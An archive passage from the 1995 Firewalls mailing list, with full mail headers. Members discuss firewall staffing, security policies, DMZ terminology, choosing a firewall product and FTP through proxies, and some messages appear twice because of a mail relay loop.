levels. If you only have a handful of emails passing each way, each day, the management requirement will be very different from that on a system where a wide range of activities are catered for, there are thousands of users, and Gbs of data passing 24X7. Although someone else may claim different, IMHO there is no linear graph which works because there are so many potential variables. Also there is the highly contentious issue of engineers 'playing'. There are subscribers to this list who clearly grew up with Internet firewalls and may have known a great deal about UNIX (or some other OS), but nothing about risk management/security, at least in the beginning. Over time they have acquired risk management knowledge, but often against a background of where they started from. At the other extreme, there are folk who are risk/security specialists from one or more environments. That provides a range of views and each of us must believe that our view is right, or nearly right. The UNIX background people are used to an environment where they start off with source code. The MS background folk generally believe the gospel according to Uncle Bill, etc. If your system is to be run by UNIX people, you may already be biased to home brew firewalls and the need for source code. That will probably result in maximum time spent on 'system management' but much of that time may be totally unnecessary. These are only a few variables, and responses to your posting will probably list a great many more, some of which may apply to your situation and some which wont. The most important factor is how you approached risk management. I really do not believe that a firewall can be treated on its own, any more than any other risk reduction service. You have to start with a real risk policy. That policy may determin that only a small % of employees need ISH access and it may be possible to restructure the private networks to reduce load on, or even remove the need for, a firewall. Do remember that many of us may have a vested interest, like trying to sell you a firewall, and the bad news about risk policies for product vendors is that sometimes they show there is no need to buy product, or that a very different type of product would best suit your specific needs. It should also establish what levels of control you should apply, and who should be managing security, and at what level. For example, a great many firewall owners simply add the security duties for the firewall to the sysad. In a structured risk management environment, you should have a security management team who are responsible for risk management through the enterprise, including information systems and gateways. How big that team is, and what % is firewall related, will depend on all the sizing factors and operational requirements. Then again, you could do what so many have done before and say that the firewall will take X% of the existing staffing time in the MIS department and hope you are right. If you are wrong then maybe you can smuggle additional headcount through later on, but then again you could end up with a bigger problem than you started out with. Ian J-B ---------- From: firewalls-owner To: Firewalls Subject: What's the admin effort Date: Thursday, October 05, 1995 5:55PM We're considering the business case for a firewall product at the moment. I've been asked how much of a persons' (or multiple people) time would be taken up in day to day operational control of a firewall, in terms of monitoring the activity, and change management. Is there any sort of benchmarking of this activity that people are aware of, I'd be interested in any statistics or experience have had. Peter Cooper From firewalls-owner Thu Oct 5 07:31:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA24071 for firewalls-outgoing; Thu, 5 Oct 1995 07:13:55 -0700 Received: from mailhost.lanl.gov (mailhost.lanl.gov [128.165.3.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA24064 for ; Thu, 5 Oct 1995 07:13:52 -0700 Received: from xdiv.lanl.gov by mailhost.lanl.gov (8.6.12/1.2) id IAA20603; Thu, 5 Oct 1995 08:12:28 -0600 Received: from xdiv.lanl.gov (arno.lanl.gov [128.165.116.121]) by xdiv.lanl.gov (8.6.12/8.6.12) with SMTP id IAA20849 for ; Thu, 5 Oct 1995 08:12:38 -0600 Date: Thu, 5 Oct 1995 08:12:38 -0600 From: Parks Fields Message-Id: <199510051412.IAA20849@xdiv.lanl.gov> To: firewalls@greatcircle.com Subject: Security policy ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello world, I know the basic of security is a good security policy. I have created a security policy but I am not 100% happy with it. Could some of you send me a copy of yours so I can figure out what mine is missing? Thank you. **************************************************************************** Parks Fields MS B218 Internet: parks@lanl.gov Los Alamos National Laboratory Phone: (505) 667-6872 Los Alamos, NM 87545 **************************************************************************** From firewalls-owner Thu Oct 5 07:58:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA24055 for firewalls-outgoing; Thu, 5 Oct 1995 07:12:10 -0700 Received: from margit.scri.fsu.edu (margit.scri.fsu.edu [144.174.128.45]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA24047 for ; Thu, 5 Oct 1995 07:12:05 -0700 Received: by margit.scri.fsu.edu (AIX 3.2/UCB 5.64/4.03) id AA12389; Thu, 5 Oct 1995 10:10:35 -0400 Date: Thu, 5 Oct 1995 10:10:35 -0400 From: hays@margit.scri.fsu.edu (Ken Hays) Message-Id: <9510051410.AA12389@margit.scri.fsu.edu> To: dasidwel@us.oracle.com Cc: firewalls@GreatCircle.COM In-Reply-To: <9510042317.AA28157@mailsun2.us.oracle.com> Subject: DMZ definition ? Reply-To: Ken Hays Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David, In one of the views of the Internet architecture, the term DMZ is used to describe the media layer (Ethernet/FDDI/...) where route peering is done among multiple administrative regions that have their own policies for routing and transit traffic. This usage is not dependant on the routing protocols used, although BGP is the current favorite for peering between autonomous systems. I believe this to be a valid use of the term DMZ, of course this usage is wrt route peering and independent of whether there is any packet level filtering implemented. This usage might be viewed as #0 in your list below since it is the least disruptive of "wide open any to any" connectivity. In this case, it does not block "direct" access of packets from the internal nets to the rest of the world. This usage may be not be to the taste of some but has existed for many years. Of course, the routers doing the route peering are prime candidates for implementing any "network router level" packet filters that you desire, as depicted in your #1 below. An example would be blocking all the r* services from the "outer" regions. Later, Ken --------------- Prompting Message Fragment Follows --------------- "David Sidwell" wrote on 04-Oct-95 at 16:09:49 -0700, in part: > > >Can anyone give me a concise defition of the term Demilitarized Zone, or DMZ >for short, in connection with firewall terminology ? I am under the belief, >perhaps incorrectly, that it is used to refer to any kind of screened subnet >placed between the internal networks and the Internet (or other external >networks). A colleague of mine is convinced that it is a separate subnet hung >off a single firewall machine. > >So would the follwoing be correctly termed DMZ's or not ? > >1. > [ packet ] [ packet ] > Internet---[filtering]----DMZ subnet----[filtering]---internal > [ router ] (containing [ router ] networks > publically > accessible > machines) > >2. As above but protected by firewalls instead of packet filtering routers. > > >3. > Internet----firewall----internal networks... > | > | > DMZ > subnet > > >Finally, does a DMZ implementation always prevent direct IP forwarding from >Internet to internal nets ? > > TIA, > David Sidwell > > From firewalls-owner Thu Oct 5 08:25:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25275 for firewalls-outgoing; Thu, 5 Oct 1995 08:00:02 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA25256 for ; Thu, 5 Oct 1995 07:59:57 -0700 Received: from gmap-gw.leeds.ac.uk by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id HAA12734; Thu, 5 Oct 1995 07:51:26 -0700 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id PAA00764 for ; Thu, 5 Oct 1995 15:31:17 +0100 Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id PAA02807 for ; Thu, 5 Oct 1995 15:52:59 +0100 From: Danny Cox Date: Thu, 5 Oct 1995 15:47:39 +0100 Message-Id: <642.9510051447@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Firewalls ISDN and modems X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Thu, 5 Oct 1995 08:43:08 -0700 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id LAA14491 for ; Thu, 5 Oct 1995 11:41:13 -0400 Date: Thu, 5 Oct 1995 11:41:13 -0400 Message-Id: <199510051541.LAA14491@psyche.the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: Anton J Aylward Subject: Re: Web Browser Test -- WHAT!!!! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The issue isn't whether I can or cannot telnet to a port and read the HTML the 'hard' way. The issue is the format and style of the posting. Go back and read the original. The issue is the philosophy, not the technology or the implelemtation. Its in the same class, IMHO, as the "Send a postcard to Craig" postings. There's always someone who doesn't know, some poor sucker who gets caught. Perhaps I'm sufficiently a social creature to try and prevent the innocent and immature from the consequences of their own folly ;-) Yes, the actual document explains what it is about, but the author could equally well have said something to that effect in the posting. Why didn't he? Would someone inviting you to a trap have formatted the message in a similar way? Acks and Kudos to those who mailed me saying their reaction to such things is simply to delete them as junk mail for much the reasons I outlined. Just because something IS technically possible doesn't mean that we have to waste the time, money and manpower flutzing around with it. 'Nuff said, end of discussion, end of thread. /anton - from a nice quite neighbourhood in paranoia city -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Thu Oct 5 09:44:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26238 for firewalls-outgoing; Thu, 5 Oct 1995 08:39:33 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26231 for ; Thu, 5 Oct 1995 08:39:29 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124655.0.12137; Thu, 05 Oct 1995 10:38:13 -0500 From: RTATE@folio.com (RTATEfolio.com) To: cmilam@cap.au.af.mil, firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.124655.0.12137@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:38:13 -0500 Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124234.0.8747; Wed, 04 Oct 1995 12:42:35 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjxm10004; Tue, 3 Oct 1995 19:43:45 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28611 for firewalls-outgoing; Tue, 3 Oct 1995 16:05:44 -0700 Received: from folio.com (smtpgate.folio.com [198.60.24.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28604 for ; Tue, 3 Oct 1995 16:05:41 -0700 From: RTATE@folio.com Received: from FOLIO_PRIMARY_DOMAIN-Message_Server by folio.com with WordPerfect_Office; Tue, 03 Oct 1995 17:07:44 -0600 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Tue, 03 Oct 1995 17:05:45 -0600 To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Thu Oct 5 09:52:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA29177 for firewalls-outgoing; Thu, 5 Oct 1995 09:49:58 -0700 Received: from inms-db.os.dhhs.gov (inms-db.os.dhhs.gov [158.70.254.28]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA29164 for ; Thu, 5 Oct 1995 09:49:52 -0700 Received: by inms-db.os.dhhs.gov (4.1/2.9-eef) id AA07041; Thu, 5 Oct 95 12:42:53 EDT Date: Thu, 5 Oct 1995 12:42:53 -0400 (EDT) From: Alan Dowd To: Parks Fields Cc: firewalls@greatcircle.com Subject: Re: Security policy ? In-Reply-To: <199510051412.IAA20849@xdiv.lanl.gov> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, Parks! On Thu, 5 Oct 1995, Parks Fields wrote: > Hello world, > > I know the basic of security is a good security policy. I have created a > security policy but I am not 100% happy with it. Could some of you > send me a copy of yours so I can figure out what mine is missing? > > Thank you. > > **************************************************************************** > Parks Fields > MS B218 Internet: parks@lanl.gov > Los Alamos National Laboratory Phone: (505) 667-6872 > Los Alamos, NM 87545 > **************************************************************************** Start out with RFC1244: Site Security Handbook. You can obtain it from http://csrc.ncsl.nist.gov/secpolcy - the document is the last one on the page: rfc1244.txt. There are more security sites and sources of policy on the net than it is reasonable to list in a single reply. Hovever, here are three good starting points for general security information: NIST Computer Security Resource Center (CSRC) http://csrc.ncsl.nist.gov TELSTRA http://www.telstra.com.au/security.html DoE Computer Incident Advisory Center (CIAC) http://ciac.llnl.gov/ciac/CIACHome.html Somewhere or another I tripped upon an archive of security policies from educational institutions, but I could not locate it on a real fast search for this reply. Perhaps, with the knowledge that it exists, you can find it with a bit of Web-walking. Regards, Al Dowd Unix Network Security Management Systems Applications, Inc. From firewalls-owner Thu Oct 5 10:00:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26400 for firewalls-outgoing; Thu, 5 Oct 1995 08:43:50 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26381 for ; Thu, 5 Oct 1995 08:43:27 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.12200; Thu, 05 Oct 1995 10:42:29 -0500 From: peter@nmti.com (Peter da Silva) To: cmilam@cap.au.af.mil, sgcccdc@citec.qld.gov.au (Colin Campbell) Cc: wbunting@ch.inri.com (wbunting), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.071240.0.12200@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:42:29 -0500 Subject: Re: FW to FW FTP w/ no port > 1023 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from relay2.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.125109.0.8805; Wed, 04 Oct 1995 12:51:09 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzjyf20945; Wed, 4 Oct 1995 00:28:48 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA05431 for firewalls-outgoing; Tue, 3 Oct 1995 20:52:03 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA05424 for ; Tue, 3 Oct 1995 20:52:00 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA09928 for GreatCircle.COM!firewalls; Tue, 3 Oct 1995 22:33:46 -0500 Received: by ris1.nmti.com (smail2.5) id AA18501; 3 Oct 95 19:37:40 CDT (Tue) Received: by sonic.nmti.com; id AA11758; Tue, 3 Oct 1995 20:04:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9510040104.AA11758@sonic.nmti.com.nmti.com> Subject: Re: FW to FW FTP w/ no port > 1023 To: sgcccdc@citec.qld.gov.au (Colin Campbell) Date: Tue, 3 Oct 1995 20:04:28 -0500 (CDT) Cc: wbunting@ch.inri.com, firewalls@GreatCircle.COM In-Reply-To: <9510022336.AA14998@citecub.citec.qld.gov.au> from "Colin Campbell" at Oct 3, 95 09:36:16 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 341 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > 3. Do not use FTP and write a TCP application that uses only a single TCP > > port for data and control. Issues: Time + $$ no compatibility. Benefit: > > solves the problem. FSP and HTTP are both candidates for this application. And they've already been written. NNTP would work as well, and can be proxied with a simple plug gateway. From firewalls-owner Thu Oct 5 10:30:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA29732 for firewalls-outgoing; Thu, 5 Oct 1995 10:11:27 -0700 Received: from inms-db.os.dhhs.gov (inms-db.os.dhhs.gov [158.70.254.28]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA29723 for ; Thu, 5 Oct 1995 10:11:20 -0700 Received: by inms-db.os.dhhs.gov (4.1/2.9-eef) id AA07052; Thu, 5 Oct 95 12:51:05 EDT Date: Thu, 5 Oct 1995 12:51:04 -0400 (EDT) From: Alan Dowd To: Parks Fields , firewalls@greatcircle.com Subject: Re: Security policy ? In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Oct 1995, Alan Dowd wrote: [... snip ...] > > Somewhere or another I tripped upon an archive of security policies from > educational institutions, but I could not locate it on a real fast search > for this reply. Perhaps, with the knowledge that it exists, you can find > it with a bit of Web-walking. > And two minutes later I found the reference: http://www.rpi.edu/Internet/Guides/decemj/icmc/organizations-standards.html Regards, Al Dowd Unix Network Security Management Systems Applications, Inc. From firewalls-owner Thu Oct 5 10:35:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26767 for firewalls-outgoing; Thu, 5 Oct 1995 08:55:00 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26751 for ; Thu, 5 Oct 1995 08:54:54 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080000.0.12306; Thu, 05 Oct 1995 10:53:37 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil (cmilam), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.080000.0.12306@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:53:37 -0500 Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080028.0.8843; Thu, 05 Oct 1995 08:00:28 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.11908; Thu, 05 Oct 1995 08:00:28 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil , firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.071240.0.11908@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 08:00:28 -0500 Subject: Need Windows FTP client source Received: from relay3.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.070658.0.8812; Thu, 05 Oct 1995 07:06:59 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQzjxg07039; Tue, 3 Oct 1995 18:08:55 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23435 for firewalls-outgoing; Tue, 3 Oct 1995 13:47:43 -0700 Received: from ns.via.net (ns.via.net [140.174.204.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23422 for ; Tue, 3 Oct 1995 13:47:38 -0700 Received: (from joe@localhost) by ns.via.net (8.6.9/8.6.9) id NAA07589 for firewalls@GreatCircle.COM; Tue, 3 Oct 1995 13:46:08 -0700 Date: Tue, 3 Oct 1995 13:46:08 -0700 From: Joe McGuckin Message-Id: <199510032046.NAA07589@ns.via.net> To: firewalls@GreatCircle.COM Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need a windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy. The problem is that most of the gui based windows FTP clients don't have a command line or a logging window to view status messages, etc. Any suggestions? -joe From firewalls-owner Thu Oct 5 11:00:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26627 for firewalls-outgoing; Thu, 5 Oct 1995 08:51:53 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26615 for ; Thu, 5 Oct 1995 08:51:48 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.075000.0.12255; Thu, 05 Oct 1995 10:50:33 -0500 From: RTATE@folio.com (RTATEfolio.com) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct05.075000.0.12255@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:50:33 -0500 Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.075007.0.8826; Thu, 05 Oct 1995 07:50:07 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124655.0.11870; Thu, 05 Oct 1995 07:50:07 -0500 From: RTATE@folio.com (RTATEfolio.com) To: cmilam@cap.au.af.mil , firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.124655.0.11870@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 07:50:07 -0500 Subject: Borderware vs. Firewall-1 Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124234.0.8747; Wed, 04 Oct 1995 12:42:35 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjxm10004; Tue, 3 Oct 1995 19:43:45 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28611 for firewalls-outgoing; Tue, 3 Oct 1995 16:05:44 -0700 Received: from folio.com (smtpgate.folio.com [198.60.24.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28604 for ; Tue, 3 Oct 1995 16:05:41 -0700 From: RTATE@folio.com Received: from FOLIO_PRIMARY_DOMAIN-Message_Server by folio.com with WordPerfect_Office; Tue, 03 Oct 1995 17:07:44 -0600 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Tue, 03 Oct 1995 17:05:45 -0600 To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Thu Oct 5 11:05:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26780 for firewalls-outgoing; Thu, 5 Oct 1995 08:55:14 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26770 for ; Thu, 5 Oct 1995 08:55:07 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080410.0.12310; Thu, 05 Oct 1995 10:53:51 -0500 From: peter@nmti.com (Peter da Silva) To: cmilam@cap.au.af.mil (cmilam), sgcccdc@citec.qld.gov.au (Colin Campbell) Cc: wbunting@ch.inri.com (wbunting), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.080410.0.12310@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:53:51 -0500 Subject: Re: FW to FW FTP w/ no port > 1023 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080028.0.8846; Thu, 05 Oct 1995 08:00:28 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.11911; Thu, 05 Oct 1995 08:00:28 -0500 From: peter@nmti.com (Peter da Silva) To: cmilam@cap.au.af.mil , sgcccdc@citec.qld.gov.au (Colin Campbell) Cc: wbunting@ch.inri.com (wbunting), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.071240.0.11911@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 08:00:28 -0500 Subject: Re: FW to FW FTP w/ no port > 1023 Received: from relay2.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.125109.0.8805; Wed, 04 Oct 1995 12:51:09 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzjyf20945; Wed, 4 Oct 1995 00:28:48 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA05431 for firewalls-outgoing; Tue, 3 Oct 1995 20:52:03 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA05424 for ; Tue, 3 Oct 1995 20:52:00 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA09928 for GreatCircle.COM!firewalls; Tue, 3 Oct 1995 22:33:46 -0500 Received: by ris1.nmti.com (smail2.5) id AA18501; 3 Oct 95 19:37:40 CDT (Tue) Received: by sonic.nmti.com; id AA11758; Tue, 3 Oct 1995 20:04:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9510040104.AA11758@sonic.nmti.com.nmti.com> Subject: Re: FW to FW FTP w/ no port > 1023 To: sgcccdc@citec.qld.gov.au (Colin Campbell) Date: Tue, 3 Oct 1995 20:04:28 -0500 (CDT) Cc: wbunting@ch.inri.com, firewalls@GreatCircle.COM In-Reply-To: <9510022336.AA14998@citecub.citec.qld.gov.au> from "Colin Campbell" at Oct 3, 95 09:36:16 am X-Mailer: ELM [version 2.4 PL23] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > 3. Do not use FTP and write a TCP application that uses only a single TCP > > port for data and control. Issues: Time + $$ no compatibility. Benefit: > > solves the problem. FSP and HTTP are both candidates for this application. And they've already been written. NNTP would work as well, and can be proxied with a simple plug gateway. From firewalls-owner Thu Oct 5 11:07:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26819 for firewalls-outgoing; Thu, 5 Oct 1995 08:56:13 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26811 for ; Thu, 5 Oct 1995 08:56:08 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.082703.0.12332; Thu, 05 Oct 1995 10:54:51 -0500 From: RTATE@folio.com (RTATEfolio.com) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct05.082703.0.12332@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:54:51 -0500 Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.082330.0.8857; Thu, 05 Oct 1995 08:23:30 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.075000.0.11935; Thu, 05 Oct 1995 08:23:30 -0500 From: RTATE@folio.com (RTATEfolio.com) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct05.075000.0.11935@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 08:23:30 -0500 Subject: Borderware vs. Firewall-1 Received: from cap.au.af.mil by 